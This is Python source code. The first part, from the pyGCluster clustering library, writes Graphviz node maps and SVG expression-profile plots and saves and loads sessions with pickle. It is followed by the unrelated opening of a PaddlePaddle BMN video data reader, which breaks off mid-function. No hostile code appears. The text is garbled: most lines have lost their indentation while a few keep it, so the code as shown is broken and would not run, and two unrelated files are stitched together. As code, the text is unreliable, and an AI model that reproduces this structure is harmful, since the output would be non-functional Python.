if ID == communityID and name != child_name and name[ 1 ] > child_name[ 1 ]:
community_names.add( name )
# Of those, extract clusters which are NOT to be skipped:
potential_parents = community_names - skipped_nodes
# get parent with lowest level:
min_level = max_level
for potential_parent_name in potential_parents:
parent, _level = potential_parent_name
if min_level > _level:
min_level = _level
for potential_parent_name in potential_parents:
parent, _level = potential_parent_name
if _level == min_level:
edge_templateString_dict[ 'parent' ] = name2nodeID[ potential_parent_name ]
break
print( edge_templateString.format( **edge_templateString_dict ), file = dot )
## connect largest cluster of each community with root:
root_name = ( self[ 'Root' ], -1 )
name2nodeID[ root_name ] = len( name2nodeID )
node_templateString_dict = {
'nodeID' : name2nodeID[ root_name ],
'freq' : scale_factor,
'label' : 'ROOT',
'c_members' : self[ 'Root size' ],
'community' : -1,
'color' : '#FFFFFF',
'metrix' : 'ALL',
'shape' : 'ellipse',
'normalized_max_obCoFreq' : '-99'
}
print( node_templateString.format( **node_templateString_dict ), file = dot )
edge_templateString_dict = { 'parent' : name2nodeID[ root_name ], 'color' : '#000000' }
for cluster in communities_top_cluster:
cluster_name = ( cluster, max_level )
edge_templateString_dict[ 'child' ] = name2nodeID[ cluster_name ]
print( edge_templateString.format( **edge_templateString_dict ), file = dot )
## add legend for the node size as additional, grey, boxed-sized nodes:
for i in range( 1, n_legend_nodes + 1 ):
                f = i / float( n_legend_nodes )  # fraction of the maximum obCoFreq that this legend node represents
node_templateString_dict = {
'nodeID' : 'legend_node_{0}'.format( i ),
'freq' : f * scale_factor,
'label' : round( f, 4 ),
'c_members' : -1,
'community' : -1,
'color' : '#BEBEBE',
'metrix' : 'None',
'shape' : 'box',
'normalized_max_obCoFreq' : '-99'
}
print( node_templateString.format( **node_templateString_dict ), file = dot)
for i in range( 1, n_legend_nodes ):
edge_templateString_dict = { 'parent' : 'legend_node_{0}'.format( i ), 'child' : 'legend_node_{0}'.format( i + 1 ), 'color' : '#BEBEBE' }
print( edge_templateString.format( **edge_templateString_dict ), file = dot )
## finalize DOT file:
print( '}', file = dot )
self.write_legend(filename = '{0}__legend.txt'.format(filename[:-4]))
try:
rendered_filename = os.path.join( self[ 'Working directory' ], '{0}.pdf'.format( filename[ : -4 ] ) )
out, err = subprocess.Popen( [ 'dot', '-Tpdf', dot_filename, '-o', rendered_filename ], stdout = subprocess.PIPE, stderr = subprocess.PIPE ).communicate()
except:
            self._print( '[ INFO ] only DOT file created, rendering with Graphviz failed.', verbosity_level = 1 )
return
def frequencies(self, identifier = None, clusterID = None, cluster = None):
'''
        Returns a tuple with (i) the cFreq and (ii) a collections.defaultdict containing the DLC:frequency pairs for either
an identifier, e.g. "JGI4|Chlre4|123456"
or clusterID
or cluster.
Returns 'None' if the identifier is not part of the data set, or clusterID or cluster was not found during iterations.
Example:
>>> cFreq, dlc_freq_dict = cluster.frequencies( identifier = 'JGI4|Chlre4|123456' )
>>> dlc_freq_dict
... defaultdict(<type 'float'>,
... {'average-correlation': 0.0, 'complete-correlation': 0.0,
... 'centroid-euclidean': 0.0015, 'median-euclidean': 0.0064666666666666666,
... 'ward-euclidean': 0.0041333333333333335, 'weighted-correlation': 0.0,
... 'complete-euclidean': 0.0014, 'weighted-euclidean': 0.0066333333333333331,
... 'average-euclidean': 0.0020333333333333332})
:param identifier: search frequencies by identifier input
:type identifier: string
:param clusterID: search frequencies by cluster ID input
:type clusterID: int
:param cluster: search frequencies by cluster (tuple of ints) input
:type cluster: tuple
:rtype: tuple
'''
if identifier is None and clusterID is None and cluster is None:
self._print( 'invalid call of function "frequencies": neither "identifier", "clusterID" nor "cluster" were given.\n\treturning None ...',
file = sys.stderr,
verbosity_level = 0
)
return None
cFreqDict = ddict(float)
if identifier != None:
# search by identifier
ident_index = self[ 'Identifiers' ].index( identifier )
for cluster, clusterID in self[ 'Cluster 2 clusterID' ].items():
if ident_index in cluster:
for i, method in enumerate(self[ 'Distance-linkage combinations' ]):
freq = self[ 'Cluster counts' ][ clusterID ][ i ] / float( self[ 'Iterations' ] )
cFreqDict[ method ] += freq
        elif clusterID != None:
            # search directly by cluster ID
            for i, dlc in enumerate( self[ 'Distance-linkage combinations' ] ):
                freq = self[ 'Cluster counts' ][ clusterID ][ i ] / float( self[ 'Iterations' ] )
                cFreqDict[ dlc ] = freq
        elif cluster != None:
            # search by cluster (tuple of object indices)
            clusterID = self[ 'Cluster 2 clusterID' ][ cluster ]
            if clusterID != None:
                for i, dlc in enumerate( self[ 'Distance-linkage combinations' ] ):
                    freq = self[ 'Cluster counts' ][ clusterID ][ i ] / float( self[ 'Iterations' ] )
                    cFreqDict[ dlc ] = freq
distance_freqs = { distance : [] for distance in self[ 'Distances' ] }
for dlc, f in cFreqDict.items():
distance, linkage = dlc.split( '-' )
distance_freqs[ distance ].append( f )
cFreq = sum( [ self.median( f ) for dist, f in distance_freqs.items() ] )
return cFreq, cFreqDict
def plot_mean_distributions(self):
'''
Creates a density plot of mean values for each condition via rpy2.
:rtype: none
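        Example (a sketch; requires a working rpy2 installation):
        >>> cluster.plot_mean_distributions()
        ... # writes 'distribution_of_means.pdf' into the working directory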
'''
try:
import rpy2.robjects as robjects
from rpy2.robjects import r
from rpy2.robjects.packages import importr
graphics = importr('graphics')
grdevices = importr('grDevices')
except ImportError:
self._print( '[ WARNING ] since "rpy2" is not available (ImportError), the plot of the distribution of mean values could not be created.', verbosity_level = 0 )
return
        grdevices.pdf( os.path.join( self[ 'Working directory' ] , 'distribution_of_means.pdf' ) )
for condition in self[ 'Conditions' ]:
means = []
for identifier in self[ 'Data' ]:
mean, sd = self[ 'Data' ][ identifier ][ condition ]
means.append( mean )
graphics.plot(
r.density( robjects.FloatVector( means ) ),
main = condition,
col = 'blue',
xlab = 'Mean values',
ylab = 'Density',
)
grdevices.dev_off()
return
def draw_expression_profiles(self, min_value_4_expression_map = None, max_value_4_expression_map = None, conditions=None):
'''
Draws an expression profile plot (SVG) for each community, illustrating the main "expression pattern" of a community.
Each line in this plot represents an object. The "grey cloud" illustrates the range of the standard deviation of the mean values.
The plots are named prefixed by "exProf", followed by the community name as it is shown in the node map.
:param min_value_4_expression_map: minimum of the y-axis (since data should be log2 values, this value should typically be < 0).
:type min_value_4_expression_map: int
:param max_value_4_expression_map: maximum for the y-axis.
:type max_value_4_expression_map: int
:rtype: none
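        Example (a minimal usage sketch; assumes communities were already built via :py:func:`pyGCluster.Cluster.build_nodemap`):
        >>> cluster.draw_expression_profiles( min_value_4_expression_map = -4, max_value_4_expression_map = 4 )
        ... # writes one 'exProf_<communityID>-<level>.svg' per community into the working directory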
'''
if conditions is None:
conditions = self[ 'Conditions' ]
# print(conditions)
self[ 'Function parameters' ][ self.draw_expression_profiles.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import numpy
FONT_SIZE = 10
y_offset = 20
MIN_V, MAX_V = min_value_4_expression_map, max_value_4_expression_map
if min_value_4_expression_map is None or max_value_4_expression_map is None:
# determine min and max for y-axis:
_yAxisMinMax = set()
for identifier in self[ 'Data' ]:
for condition in self[ 'Data' ][ identifier ]:
mean, sd = self[ 'Data' ][ identifier ][ condition ]
_yAxisMinMax.add( round( mean + sd, 2 ) )
_yAxisMinMax.add( round( mean - sd, 2 ) )
if min_value_4_expression_map is None:
MIN_V = int( math.ceil( min( _yAxisMinMax ) ) ) - 1
if max_value_4_expression_map is None:
MAX_V = int( math.ceil( max( _yAxisMinMax ) ) )
# give y-axis the same amount in positive and negative direction (e.g. from - 10 to 10):
if min_value_4_expression_map is None and max_value_4_expression_map is None: # but only if no value is given, otherwise it's probably user-chosen!
if MAX_V > abs( MIN_V ):
MIN_V = MAX_V * -1
else:
MAX_V = MIN_V * -1
startingX = 100
        startingY = 300 + y_offset # determine length of y-axis and y-range, represents zero point
maxY = ( startingY - y_offset ) * 2
scalingX = max( [ len( con ) * FONT_SIZE for con in conditions ] ) + 20 # distance between each condition
scalingY = ( maxY - ( startingY - y_offset ) ) / float( MAX_V ) * -1 # has to be negative!
def svg_text(x, y, text):
return '<text x="{0}" y="{1}"> {2} </text>'.format( x, y, text )
def svg_line(x1, y1, x2, y2):
return '<line x1="{0}" y1="{1}" x2="{2}" y2="{3}" style="stroke:#000000"/>'.format( x1, y1, x2, y2 )
def svg_comment(text):
return '<!-- {0} -->'.format( text )
def min_max_ratioWithSD(ratios, SDs):
ratios_plus_SD = [ ratio + SDs[ i ] for i, ratio in enumerate( ratios ) ]
ratios_minus_SD = [ ratio - SDs[ i ] for i, ratio in enumerate( ratios ) ]
return min( ratios_minus_SD ), max( ratios_plus_SD )
n_conditions = len( conditions )
max_level = max( [ name[1] for name in self[ 'Communities' ] ] )
for cluster in self._get_levelX_clusters( max_level ):
if len( cluster ) > self[ 'for IO skip clusters bigger than' ]:
continue
shape = ( len( cluster ), len( conditions ) )
ratios = numpy.zeros( shape )
SDs = numpy.zeros( shape )
identifiers = []
for row_index, identifier_index in enumerate( cluster ):
try:
identifier = self[ 'Identifiers' ][ identifier_index ]
except:
print(identifier_index, len( self['Identifiers']))
exit(1)
for col_index, condition in enumerate( conditions ):
mean, sd = self[ 'Data' ][ identifier ][ condition ]
ratios[ row_index ][ col_index ] = mean
SDs[ row_index ][ col_index ] = sd
addOn = ''
try:
                    addOn = self[ 'Additional Labels' ][ identifier ]
                    if isinstance( addOn, ( list, set ) ):
                        addOn = ".oOo.".join( list( set( addOn ) ) )
except:
pass
if addOn:
identifiers.append( '{0}___{1}'.format( identifier, addOn ) )
else:
identifiers.append( identifier )
### draw expression profile:
communityID = self[ 'Communities' ][ ( cluster, max_level ) ][ 'cluster ID' ]
n_values = len( ratios )
with open( os.path.join( self[ 'Working directory' ] , 'exProf_{0}-{1}.svg'.format( communityID, max_level ) ), 'w') as fout:
width = startingX + scalingX * ( n_conditions -1 ) + len( conditions[ -1 ] ) * FONT_SIZE + max( [ len( i ) * FONT_SIZE for i in identifiers ] ) + 10
s = '<svg xmlns="http://www.w3.org/2000/svg" version="1.1" font-size="{2}px" font-family="Verdana" width="{0}" height="{1}">'
print( s.format( width, maxY + y_offset + FONT_SIZE, FONT_SIZE ), file = fout )
## draw SD-cloud:
# determine min and max ratio + SD:
print( svg_comment( 'SD CLOUD:' ), file = fout )
for i in range( n_conditions - 1 ):
y1_min, y1_max = min_max_ratioWithSD( [ ratios[ j ][ i ] for j in range( n_values ) ], [ SDs[ j ][ i ] for j in range( n_values ) ] )
y2_min, y2_max = min_max_ratioWithSD( [ ratios[ j ][ i + 1 ] for j in range( n_values ) ], [ SDs[ j ][ i + 1 ] for j in range( n_values ) ] )
s = '<path d="M{x1} {y1_min} L{x2} {y2_min} L{x2} {y2_max} L{x1} {y1_max} Z" fill="{fill}"/>'
d = { 'fill' : '#D3D3D3'}
d[ 'x1' ] = startingX + i*scalingX
d[ 'x2' ] = startingX+(i+1)*scalingX
d[ 'y1_min' ] = startingY + y1_min*scalingY
d[ 'y1_max' ] = startingY + y1_max*scalingY
d[ 'y2_min' ] = startingY + y2_min*scalingY
d[ 'y2_max' ] = startingY + y2_max*scalingY
print( s.format( **d ), file = fout )
## draw expression profile lines:
print( svg_comment( 'EXPRESSION PROFILE LINES:' ), file = fout )
for i in range( n_conditions - 1 ):
for j in range( n_values ):
d = {}
d[ 'x1' ] = startingX + i * scalingX
d[ 'x2' ] = startingX + ( i + 1 ) * scalingX
d[ 'y1' ] = startingY + ratios[ j ][ i ] * scalingY
d[ 'y2' ] = startingY + ratios[ j ][ i + 1 ] * scalingY
print( svg_line( x1 = d[ 'x1' ], y1 = d[ 'y1' ], x2 = d[ 'x2' ], y2 = d[ 'y2' ] ), file = fout )
## add legend:
print( svg_comment( 'LEGEND:' ), file = fout )
# first, collect all values to plot -> to allow removing overlapping identifiers:
legend = []
for i, identifier in enumerate( identifiers ):
_last_ratio = ratios[ i ][ -1 ]
_x = startingX + scalingX * ( n_conditions - 1 ) + 2
_y = startingY + _last_ratio * scalingY
legend.append( ( _y, _x, identifier ) )
legend.sort()
# get all y-differences:
y_differences = []
for i, ( y, x, identifier ) in enumerate( legend[ : -1 ] ):
y_differences.append( legend[ i + 1 ][ 0 ] - y )
# max font size for legend is the minimum y distance -> no overlap!
legend_maxFontSize = int( round( min( y_differences ) ) )
if legend_maxFontSize == 0:
legend_maxFontSize = 1
# plot legend
for y, x, identifier in legend:
print( '<text x="{0}" y="{1}" font-size="{3}px">{2}</text>'.format( x, y, identifier, legend_maxFontSize ), file = fout )
## plot axis:
print( svg_comment( 'AXES:' ), file = fout )
# y-axis:
print(svg_line( x1 = 50, y1 = startingY + MAX_V * scalingY, x2 = 50, y2 = maxY + y_offset), file = fout )
# y-axis - ticks:
y_ticks_per_unit = 2
for i in range( 1, MAX_V * y_ticks_per_unit + 1 ):
_ratio = float( i ) / y_ticks_per_unit
_y = startingY + _ratio * scalingY
print( svg_text( x = 0, y = _y + FONT_SIZE // 2, text = '+{0}'.format( _ratio ) ), file = fout )
print( svg_line( x1 = 40, y1 = _y, x2 = 60, y2 = _y ), file = fout )
for i in range( 1, abs( MIN_V ) * y_ticks_per_unit + 1 ):
_ratio = float( i ) / y_ticks_per_unit * -1
_y = startingY + _ratio * scalingY
print( svg_text( x = 0, y = _y + FONT_SIZE // 2, text = _ratio), file = fout )
print( svg_line( x1 = 40, y1 = _y, x2 = 60, y2 = _y), file = fout )
print( svg_text( x = 0, y = startingY + FONT_SIZE // 2, text = 0.0 ), file = fout )
print( svg_line( x1 = 40, y1 = startingY, x2 = 60, y2 = startingY ), file = fout )
# zero-line:
print( svg_line( x1 = 50, y1 = startingY, x2 = startingX + scalingX * ( n_conditions - 1 ), y2 = startingY ), file = fout )
# x-axis = conditions:
for i, condition in enumerate( conditions ):
_x = startingX + scalingX * i
print( svg_text( x= _x + 2, y = maxY + y_offset + FONT_SIZE, text = condition), file = fout )
s = '<line x1="{0}" y1="{1}" x2="{2}" y2="{3}" style="stroke-dasharray: 5, 5; stroke:#000000"/>'
print( s.format( _x, startingY + MAX_V * scalingY, _x, maxY + y_offset), file = fout )
print( '</svg>', file = fout )
self._print( '... community expression profile plots saved in "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 1 )
return
def do_it_all(
self,
working_directory = None,
distances = None,
linkages = None, function_2_generate_noise_injected_datasets = None,
min_cluster_size = 4, alphabet = None, force_plotting = False, min_cluster_freq_2_retain = 0.001,
pickle_filename = 'pyGCluster_resampled.pkl', cpus_2_use = None, iter_max = 250000,
iter_tol = 0.01 / 100000, iter_step = 5000, iter_top_P = 0.001, iter_window = 50000, iter_till_the_end = False,
top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01,
starting_min_overlap = 0.1, increasing_min_overlap = 0.05,
color_gradient = 'default', box_style = 'classic',
min_value_4_expression_map = None, max_value_4_expression_map = None, additional_labels = None
):
'''
        Invokes all functions which constitute the main functionality of pyGCluster.
This is AHC clustering with noise injection and a variety of DLCs,
in order to identify highly reproducible clusters,
followed by a meta-clustering of highly reproducible clusters into so-called 'communities'.
        The functions that are called are:
            - :py:func:`pyGCluster.Cluster.resample`
            - :py:func:`pyGCluster.Cluster.plot_clusterfreqs`
            - :py:func:`pyGCluster.Cluster.build_nodemap`
            - :py:func:`pyGCluster.Cluster.write_dot`
            - :py:func:`pyGCluster.Cluster.draw_community_expression_maps`
            - :py:func:`pyGCluster.Cluster.draw_expression_profiles`
        For a complete list of possible distance metrics see:
            http://docs.scipy.org/doc/scipy/reference/spatial.distance.html
        For a complete list of possible linkage methods see:
            http://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
.. note ::
If memory is of concern (e.g. for a large dataset, > 5000 objects), cpus_2_use should be kept low.
:param distances: list of distance metrices, given as strings, e.g. [ 'correlation', 'euclidean' ]
:type distances: list
:param linkages: list of distance metrices, given as strings, e.g. [ 'average', 'complete', 'ward' ]
:type linkages: list
:param function_2_generate_noise_injected_datasets: function to generate noise-injected datasets. If None (default), Gaussian distributions are used.
:type function_2_generate_noise_injected_datasets: function
:param min_cluster_size: minimum size of a cluster, so that it is included in the assessment of cluster reproducibilities.
:type min_cluster_size: int
:param alphabet: alphabet used to convert decimal indices to characters to save memory. Defaults to string.printable, without ','.
:type alphabet: string
.. note ::
            If alphabet contains ',', this character is removed from alphabet, because the indices comprising a cluster are saved comma-separated.
:param force_plotting: the convergence plot is created after each iter_step iteration (otherwise only when convergence is detected).
:type force_plotting: boolean
:param min_cluster_freq_2_retain: ]0, 1[ minimum frequency of a cluster (only the maximum of the dlc-frequencies matters here) it has to exhibit to be stored in pyGCluster once all iterations are finished.
:type min_cluster_freq_2_retain: float
:param cpus_2_use: number of threads that are evoked in the re-sampling routine.
:type cpus_2_use: int
:param iter_max: maximum number of re-sampling iterations.
:type iter_max: int
Convergence determination:
:param iter_tol: ]0, 1e-3[ value for the threshold of the median of normalized slopes, in order to declare convergence.
:type iter_tol: float
:param iter_step: number of iterations each multiprocess performs and simultaneously the interval in which to check for convergence.
:type iter_step: int
        :param iter_top_P: ]0, 1[ for the convergence estimation, the most frequent clusters are examined. This is the threshold for the minimum frequency of a cluster to be included.
:type iter_top_P: float
:param iter_window: size of the sliding window in iterations. The median is obtained from normalized slopes inside this window - *should be a multiple of iter_step*
:type iter_window: int
:param iter_till_the_end: if set to True, the convergence determination is switched off; hence, re-sampling is performed until iter_max is reached.
:type iter_till_the_end: boolean
Output/Plotting:
:param pickle_filename: Filename of the output pickle object
:type pickle_filename: string
:param top_X_clusters: Plot of the top X clusters in the sorted list (by freq) of clusters having a maximum cluster frequency of at least threshold_4_the_lowest_max_freq (clusterfreq-plot is still sorted by size).
:type top_X_clusters: int
:param threshold_4_the_lowest_max_freq: ]0, 1[ Clusters must have a maximum frequency of at least threshold_4_the_lowest_max_freq to appear in the plot.
:type threshold_4_the_lowest_max_freq: float
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param box_style: the way the relative standard deviation is visualized in the expression map. Currently supported are 'modern', 'fusion' or 'classic'.
:type box_style: string
:param starting_min_overlap: ]0, 1[ minimum required relative overlap between clusters so that they are assigned the same community. The relative overlap is defined as the size of the overlap between two clusters, divided by the size of the larger cluster.
:type starting_min_overlap: float
:param increasing_min_overlap: defines the increase of the required overlap between communities
:type increasing_min_overlap: float
:param additional_labels: dictionary, where additional labels can be defined which will be added in the expression map plots to the gene/protein names
:type additional_labels: dict
:rtype: None
For more information to each parameter, please refer to :py:func:`pyGCluster.Cluster.resample`,
and the subsequent functions:
:py:func:`pyGCluster.Cluster.build_nodemap`,
:py:func:`pyGCluster.Cluster.write_dot`,
:py:func:`pyGCluster.Cluster.draw_community_expression_maps`,
:py:func:`pyGCluster.Cluster.draw_expression_profiles`.
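        Example (a minimal usage sketch; "cluster" denotes a pyGCluster.Cluster instance initialized with data, and the small iter_max merely keeps the sketch short):
        >>> cluster.do_it_all( distances = [ 'euclidean', 'correlation' ], linkages = [ 'complete', 'average', 'ward' ], iter_max = 10000 )
        ... # resamples, builds communities and writes all plots into the working directory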
'''
if working_directory != None:
self[ 'Working directory' ] = working_directory
if distances is None:
distances = [ 'euclidean', 'correlation' ]
if linkages is None:
linkages = [ 'complete', 'average', 'weighted', 'centroid', 'median', 'ward' ]
if additional_labels != None:
self[ 'Additional Labels' ] = additional_labels
self._print( 'RESAMPLING ...', verbosity_level = 2 )
self.resample(
distances = distances,
linkages = linkages,
function_2_generate_noise_injected_datasets = function_2_generate_noise_injected_datasets,
alphabet = alphabet,
iter_max = iter_max,
iter_top_P = iter_top_P,
iter_step = iter_step,
iter_tol = iter_tol,
iter_window = iter_window,
min_cluster_size = min_cluster_size,
min_cluster_freq_2_retain = min_cluster_freq_2_retain,
pickle_filename = pickle_filename,
cpus_2_use = cpus_2_use,
iter_till_the_end = iter_till_the_end
)
self._print( 'Resampling done.', verbosity_level = 2 )
self._print( '\nplotting cluster frequencies, building node map, drawing expression maps ...', verbosity_level = 2 )
self.plot_clusterfreqs(
min_cluster_size = min_cluster_size,
top_X_clusters = top_X_clusters,
threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq,
)
self.build_nodemap(
min_cluster_size = min_cluster_size,
top_X_clusters = top_X_clusters,
threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq,
starting_min_overlap = starting_min_overlap,
increasing_min_overlap = increasing_min_overlap
)
dot_filename = 'nodemap_minSize{0}_top{1}_top{2:.0f}promille.dot'.format( min_cluster_size, top_X_clusters, threshold_4_the_lowest_max_freq * 1000 )
self.write_dot(
filename = dot_filename,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
color_gradient = color_gradient,
box_style = box_style
)
self.draw_community_expression_maps(
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
color_gradient = color_gradient,
box_style = box_style
)
self.draw_expression_profiles(
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map
)
return
def info(self):
'''
Prints some information about the clustering via pyGCluster:
- number of genes/proteins clustered
- number of conditions defined
- number of distance-linkage combinations
- number of iterations performed
as well as some information about the communities, the legend for the shapes of nodes in the node map and the way the functions were called.
:rtype: none
'''
self._print( '[ INFO ] {0:*^100}'.format( ' info function START ' ), verbosity_level = 0 )
self._print('''
{0:>9} identifiers were used to cluster
{1:>9} conditions were defined
            {2:>9} distance-linkage combinations were used
{3:>9} iterations were performed
'''.format(
len( self[ 'Identifiers' ] ),
len( self[ 'Conditions' ] ),
len( self[ 'Distance-linkage combinations' ] ),
self[ 'Iterations' ]
), verbosity_level = 0
)
self._print( 'Results are saved in the folder: "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 0 )
if 'Communities' in self.keys() and self[ 'Communities' ] != {}:
max_level = max( [ name[1] for name in self[ 'Communities' ] ] )
communities_top_cluster = self._get_levelX_clusters( level = max_level )
communities_minus_close2root = [ c for c in communities_top_cluster if len( c ) < self[ 'for IO skip clusters bigger than' ] ]
s = '{3} most_frequent_clusters were combined into {0} communities. {1} of those communities contain more than {2} objects \n(i.e. are "close to root" communities).'
n_communities = len( communities_top_cluster)
self._print( s.format( n_communities, n_communities - len( communities_minus_close2root ), self[ 'for IO skip clusters bigger than' ], len( self._get_levelX_clusters( level = 0 ) ) ), verbosity_level = 0 )
self._print( 'See below for the parameters that were used to form communities (function "build_nodemap").', verbosity_level = 0 )
else:
self._print( 'Communities were not yet formed.', verbosity_level = 0 )
if 'nodemap metric2shape' in self.keys():
self._print( 'The legend for the node shapes in the DOT file is:', verbosity_level = 0 )
for metric, shape in self[ 'nodemap metric2shape' ]:
self._print( ' - clusters that are found by distance metric(s): "{0}" are visualized as "{1}"'.format( metric, shape ), verbosity_level = 0 )
self._print( 'Values of the parameters of the functions that were already called:', verbosity_level = 0 )
for function_name in self[ 'Function parameters' ]:
self._print( '\t- function {0} was called with ...'.format( function_name ), verbosity_level = 0 )
for kw, value in sorted( self[ 'Function parameters' ][ function_name ].items() ):
self._print( '{0: >45} : {1}'.format( kw, value ), verbosity_level = 0 )
self._print( '[ INFO ] {0:*^100}'.format( ' info function END ' ), verbosity_level = 0 )
return
def save(self, filename = 'pyGCluster.pkl'):
'''
    Saves the current pyGCluster.Cluster object as a pickle file.
:param filename: may be either a simple file name ("example.pkl") or a complete path (e.g. "/home/user/Desktop/example.pkl"). In the former case, the pickle is stored in pyGCluster's working directory.
:type filename: string
    :rtype: None
'''
tmp = {}
for key in self.keys():
tmp[ key ] = self[ key ]
if not os.path.split( filename )[ 0 ]:
with open( os.path.join( self[ 'Working directory' ], filename ), 'wb' ) as fout:
pickle.dump( tmp, fout )
self._print( 'pyGCluster pickled in: "{0}"'.format( os.path.join( self[ 'Working directory' ], filename ) ), verbosity_level = 1 )
else:
with open( filename, 'wb' ) as fout:
pickle.dump( tmp, fout )
self._print( 'pyGCluster pickled in: "{0}"'.format( filename ), verbosity_level = 1 )
return
def load(self, filename):
'''
Fills a pyGCluster.Cluster object with the session saved as "filename".
If "filename" is not a complete path, e.g. "example.pkl" (instead of "/home/user/Desktop/example.pkl"), the directory given by self[ 'Working directory' ] is used.
    .. note::
Loading of pyGCluster has to be performed as a 2-step-procedure:
>>> LoadedClustering = pyGCluster.Cluster()
>>> LoadedClustering.load( "/home/user/Desktop/example.pkl" )
:param filename: may be either a simple file name ("example.pkl") or a complete path (e.g. "/home/user/Desktop/example.pkl").
:type filename: string
    :rtype: None
'''
_dir, _file = os.path.split( filename )
if _dir:
with open( filename, 'rb' ) as fin:
tmp = pickle.load( fin )
else:
with open( os.path.join( self[ 'Working directory' ], filename ), 'rb' ) as fin:
tmp = pickle.load( fin )
for key in tmp.keys():
self[ key ] = tmp[ key ]
self._print( 'pyGCluster loaded.', verbosity_level = 1 )
return
def median(self, _list):
'''
Returns the median from a list of numeric values.
    :param _list: list of numeric values
:type _list: list
:rtype: int / float
'''
_list = sorted( _list )
length = len( _list )
value = None
if length % 2 == 0:
# even !
value = ( _list[ length // 2 ] + _list[ length // 2 - 1 ] ) / 2.0
else:
# odd !
value = _list[ length // 2 ]
return value
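    # Worked example (sketch): for an even-length list the two central values are
    # averaged, for an odd-length list the central element is returned, e.g.
    #     self.median( [ 1, 2, 3, 4 ] )  ->  2.5
    #     self.median( [ 1, 2, 3 ] )     ->  2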
def _print(self, *args, **kwargs):
'''
Internal print function which implements the "verbosity_level" parameter.
    :rtype: None
'''
if kwargs[ 'verbosity_level' ] <= self[ 'Verbosity level' ]:
del kwargs[ 'verbosity_level' ]
print( *args, **kwargs )
return
if __name__ == '__main__':
    # invoke the freeze_support function on Windows-based systems
try:
sys.getwindowsversion()
multiprocessing.freeze_support()
except:
pass
x = Cluster()
exit()
|
bmn_reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import os
import platform
import random
import numpy as np
import multiprocessing
import json
import logging
import functools
import paddle
import paddle.fluid as fluid
logger = logging.getLogger(__name__)
from .reader_utils import DataReader
from models.bmn.bmn_utils import iou_with_anchors, ioa_with_anchors
class BMNReader(DataReader):
"""
    Data reader for the BMN model; its data are stored as features extracted by prior networks
dataset cfg: anno_file, annotation file path,
feat_path, feature path,
tscale, temporal length of BM map,
dscale, duration scale of BM map,
anchor_xmin, anchor_xmax, the range of each point in the feature sequence,
batch_size, batch size of input data,
num_threads, number of threads of data processing
"""
def __init__(self, name, mode, cfg):
self.name = name
self.mode = mode
self.tscale = cfg.MODEL.tscale # 100
self.dscale = cfg.MODEL.dscale # 100
self.anno_file = cfg.MODEL.anno_file
self.file_list = cfg.INFER.filelist
self.subset = cfg[mode.upper()]['subset']
self.tgap = 1. / self.tscale
self.feat_path = cfg.MODEL.feat_path
self.get_dataset_dict()
self.get_match_map()
self.batch_size = cfg[mode.upper()]['batch_size']
self.num_threads = cfg[mode.upper()]['num_threads']
if (mode == 'test') or (mode == 'infer'):
self.num_threads = 1 # set num_threads as 1 for test and infer
def get_dataset_dict(self):
self.video_dict = {}
        if self.mode == "infer":
            with open(self.file_list) as f:
                annos = json.load(f)
            for video_name in annos.keys():
                self.video_dict[video_name] = annos[video_name]
        else:
            with open(self.anno_file) as f:
                annos = json.load(f)
for video_name in annos.keys():
video_subset = annos[video_name]["subset"]
if self.subset in video_subset:
self.video_dict[video_name] = annos[video_name]
self.video_list = list(self.video_dict.keys())
self.video_list.sort()
print("%s subset video numbers: %d" %
(self.subset, len(self.video_list)))
def get_match_map(self):
match_map = []
for idx in range(self.tscale):
tmp_match_window = []
xmin = self.tgap * idx
for jdx in range(1, self.tscale + 1):
xmax = xmin + self.tgap * jdx
tmp_match_window.append([xmin, xmax])
match_map.append(tmp_match_window)
match_map = np.array(match_map)
match_map = np.transpose(match_map, [1, 0, 2])
match_map = np.reshape(match_map, [-1, 2])
self.match_map = match_map
self.anchor_xmin = [self.tgap * i for i in range(self.tscale)]
self.anchor_xmax = [self.tgap * i for i in range(1, self.tscale + 1)]
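        # Note: match_map has shape [tscale * tscale, 2]; row d * tscale + s holds the
        # normalized [xmin, xmax] window that starts at anchor s and spans d + 1
        # temporal gaps (interpreted as a dscale x tscale grid when dscale == tscale,
        # as in the default config).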
def get_video_label(self, video_name):
video_info = self.video_dict[video_name]
video_second = video_info['duration_second']
video_labels = video_info['annotations']
gt_bbox = []
gt_iou_map = []
for gt in video_labels:
tmp_start = max(min(1, gt["segment"][0] / video_second), 0)
tmp_end = max(min(1, gt["segment"][1] / video_second), 0)
gt_bbox.append([tmp_start, tmp_end])
tmp_gt_iou_map = iou_with_anchors(
self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end)
tmp_gt_iou_map = np.reshape(tmp_gt_iou_map,
[self.dscale, self.tscale])
gt_iou_map.append(tmp_gt_iou_map)
gt_iou_map = np.array(gt_iou_map)
gt_iou_map = np.max(gt_iou_map, axis=0)
gt_bbox = np.array(gt_bbox)
gt_xmins = gt_bbox[:, 0]
gt_xmaxs = gt_bbox[:, 1]
gt_lens = gt_xmaxs - gt_xmins
gt_len_small = 3 * self.tgap
